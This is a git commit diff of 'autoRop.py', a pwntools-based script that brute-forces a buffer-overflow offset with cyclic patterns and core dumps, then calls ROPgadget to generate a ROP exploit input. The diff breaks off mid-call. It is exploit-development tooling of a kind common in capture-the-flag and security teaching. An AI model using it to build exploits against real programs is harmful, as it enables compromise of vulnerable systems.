Clean up find_offset and add payload args

This commit is contained in:
Liam Dalgarno 2020-11-26 06:47:19 +00:00
parent 8aef68e35f
commit bc63dfe0af

67
auto-rop.py → autoRop.py Normal file → Executable file
View File

@ -1,14 +1,26 @@
from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack
from pwnlib.tubes.process import process, signal
import os
import sys
import subprocess
import argparse import argparse
import atexit
import math
import os
import subprocess
import sys
from contextlib import redirect_stderr from contextlib import redirect_stderr
from pwnlib.context import context
from pwnlib.elf.corefile import Coredump
from pwnlib.tubes.process import process, signal
from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack
from pwnlib import atexit as pwnlibexit
# pwnlib has its own version of atexit to do stuff when the program exits, but uses sys.exitfunc
# to do so... unfortunately this was deprecated in python3 so it no longer works!
# either we use python2 or just re-register the pwnlib functions as follows
# why does everything use python2 :(
atexit.register(pwnlibexit._run_handlers)
# delete the corefiles on exit
context.update(delete_corefiles=True)
print(r''' print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______ _ ___ _.--. ___ _____ ______ _____ ______ ______
@ -22,49 +34,50 @@ print(r'''
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable") arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit") arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--core", "--c", metavar="core_file", default="core", type=str, help="The name of the generated core file")
arg_parser.add_argument("rop_file", metavar="rop_file", type=str, help="The name of the generated ROP input file") arg_parser.add_argument("rop_file", metavar="rop_file", type=str, help="The name of the generated ROP input file")
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
args = arg_parser.parse_args() args = arg_parser.parse_args()
exec_file = args.exec_file exec_file = args.exec_file
core_file = args.core
rop_file = args.rop_file rop_file = args.rop_file
min_payload = args.min_payload
max_payload = args.max_payload
def find_offset(exec_file, core_file): def find_offset(exec_file: str, min_payload: int, max_payload: int):
input_file = "input.txt" input_file = "input.txt"
try: payload_size = min_payload
os.remove(core_file) while payload_size <= max_payload:
except:
pass
payload_size = 32
while payload_size <= 16384:
print(f"[🤔] Trying payload {payload_size}...") print(f"[🤔] Trying payload {payload_size}...")
with open(input_file, "wb") as f: with open(input_file, "wb") as f:
payload = cyclic(payload_size) payload = cyclic(payload_size)
f.write(payload) f.write(payload)
process([f"./{exec_file}", input_file]).wait() proc = process([f"./{exec_file}", input_file])
exit_code = proc.poll(block=True)
try: if exit_code != 0:
# ignore the warnings returned by pwnlib, if finding corefile fails then core is None
with open("/dev/null", "w") as f, redirect_stderr(f): with open("/dev/null", "w") as f, redirect_stderr(f):
core = Coredump(f"./{core_file}") core = proc.corefile
if core and pack(core.eip) in payload: if core is not None and pack(core.eip) in payload:
offset = cyclic_find(core.eip) offset = cyclic_find(core.eip)
print(f"[😳] Found offset at {offset}!") print(f"[😳] Found offset at {offset}!\n")
return offset return offset
except FileNotFoundError:
pass
os.remove(input_file)
payload_size *= 2 payload_size *= 2
raise BaseException("[😞] Failed to find offset.") return -1
offset = find_offset(exec_file, core_file) offset = find_offset(exec_file, min_payload, max_payload)
if offset == -1:
print(f"[😞] Failed to find offset. Try increasing the payload bounds and ensuring core dumps are enabled!")
sys.exit(0)
print(f"[🤔] Running ROPgadget with offset {offset}...") print(f"[🤔] Running ROPgadget with offset {offset}...")
result = subprocess.run( result = subprocess.run(